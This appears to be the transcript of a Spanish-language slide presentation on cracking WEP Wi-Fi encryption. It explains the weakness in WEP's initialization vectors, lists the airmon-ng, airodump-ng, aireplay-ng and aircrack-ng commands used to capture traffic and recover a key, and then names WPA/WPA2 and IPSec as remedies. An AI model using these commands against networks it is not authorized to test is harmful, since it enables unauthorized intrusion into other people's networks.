Cracking WEP
-
Upload
hernan-reyes -
Category
Technology
-
view
5.105 -
download
5
description
Transcript of Cracking WEP
@jesusbolivar
Cracking WEP
@jesusbolivar
WEP – Wired Equivalent Privacy
• Protocolo de encriptación • 5/13 caracteres ASCII o 10/26 caracteres
hexadecimales • Vulnerabilidades descubiertas en 2001• Sustituido por WPA (Wi-Fi Protected Access)
en 2003• Declarado obsoleto en 2004
@jesusbolivar
El Problema
• Protocolo defectuoso• 40/104 bits de clave + 24 bits de vector de
inicialización• 50 % de probabilidad de que un VI se repita
después de 5000 paquetes• El numero máximo de VIs diferentes es
limitado
@jesusbolivar
El Ataque
• Hacer que el Access Point agote los VIs posibles
• Recolectar 50.000+ VIs• Conseguir la clave utilizando un método
estadístico • Tiempo de ejecución 5-15 min
@jesusbolivar
El Ataque
• airmon-ng start wlan0• airodump-ng -c canal -w test --encrypt wep mon0
• aireplay-ng -3 -b mac_ap -h mac_cliente_conectado wlan0
• aircrack-ng -e nombrered test*.cap
@jesusbolivar
El Ataque
• airmon-ng stop mon0• airmon-ng stop wlan0• ifconfig wlan0 down• iwconfig wlan0 channel x essid nombrered key s:clave mode managed
• ifconfig wlan0 up• service networking restart
@jesusbolivar
The Tools
• BackTrack 4• Suite Aircrack-ng• Tarjeta inalámbrica soportada o paciencia… en
algunos casos :)
@jesusbolivar
El Remedio
• WPA/WPA2• IPSec• WEP en Modo Open (solo un poco mas seguro
que WEP)
@jesusbolivar
Sources
• http://www.aircrack-ng.org/doku.php• http://www.backtrack-linux.org• http://es.wikipedia.org/wiki/WEP